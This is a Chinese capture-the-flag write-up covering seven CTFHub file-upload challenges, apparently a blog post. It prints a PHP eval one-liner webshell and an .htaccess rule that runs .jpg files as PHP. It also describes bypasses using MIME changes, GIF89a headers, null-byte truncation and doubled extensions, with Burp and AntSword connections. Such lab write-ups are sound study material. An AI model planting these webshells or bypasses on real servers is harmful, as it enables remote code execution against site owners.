CTFHub-Web-文件上传

CTFHub-Web-文件上传-WP

一、无验证

1.编写一段PHP木马脚本

image-20240416174337085

2.将编写好的木马进行上传

image-20240416174449325

3.显示上传成功了

image-20240416174524311

4.使用文件上传工具进行尝试

image-20240416193600047

5.连接成功进入文件管理

image-20240416193749103

6.上翻目录找到flag文件

image-20240416193834579

7.打开文件查看flag

image-20240416193852034


二、前端验证

1.制作payload进行上传发现不允许这种类型的文件上传

image-20240416195044135

2.改后缀名为jpg尝试进行上传

image-20240416195125890

3.上传成功查看源码发现只运行三种格式的文件进行上传

image-20240416195317212

4.打开Burp抓取上传数据包,将上传的文件后缀名改为1.php,文件类型改为php后进行发送

image-20240416195514017

5.显示上传成功

image-20240416195639313

6.打开蚁剑进行连接

image-20240416195745522

7.上翻目录找到flag文件后打开查看flag

image-20240416195839346

三、.htaccess

1.编写一段话,让服务器识别到jpg文件就转换为php语句进行执行,然后将文件后缀名改为.heaccess

AddType application/x-httpd-php .jpg

image-20240416182358378

2.再创建一个PHP程序,写入一句话木马将文件后缀名改为PHP,POST里面包含的就是密码shell

<?php @eval($_POST['shell']);?>

image-20240416182521415

3.先上传.htaccess文件

image-20240416194039254

4.然后上传PHP木马

image-20240416194150598

5.使用蚁剑进行连接

image-20240416194256026

6.连接成功后进入上级目录寻找flag文件并打开获得flag

image-20240416194417487

四、MIME绕过

1.先上传PHP木马发现不允许该类型的文件进行上传

image-20240416202640994

2.将PHP木马的的文件后缀改成JPG后,打开Burp进行抓包

image-20240416202816320

2.将文件文件限制改为image/php后进行发送

image-20240416203209126

3.显示上传成功

image-20240416203238182

4.打开蚁剑进行连接

image-20240416203347479

5.上翻目录找到flag文件所在位置打开查看flag

image-20240416203417201

五、文件头检查

1.打开环境,上传PHP木马后进行抓包

image-20240416203918260

2.将文件类型改为jpg,文件头信息改为GIF89a,表示这是个GIF文件后进行发送

image-20240416204005127

3.显示上传成功

image-20240416204055808

4.使用蚁剑进行连接

image-20240416204154427

5.连接成功后打开文件管理上翻找到flag文件查看flag

image-20240416204223586

六、00截断

1.查看源码发现只能上传jpg,png,gif类型的文件

image-20240416204627397

2.将payload改为jpg格式进行上传,使用Burp进行抓包后更改数据包头进行00截断

image-20240416205057478

3.显示上传成功后打开蚁剑进行连接

image-20240416205145550

4.需要重定义路径进行连接

image-20240416205630366

5.上翻目录找到flag文件进行打开查看flag

image-20240416205729518

七、双写绕过

1.查看页面源码发现使用了双写验证将后缀替换成空,但是只替换了一次

image-20240416210036252

2.将文件后缀改为pphphp

image-20240416210147499

3.在网页直接进行上传,发现文件后缀已经变成了php

image-20240416210224929

4.依旧使用蚁剑进行连接后打开文件管理上翻找到flag文件打开查看flag

image-20240416210311178


image-20240416210353659


  • 17
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值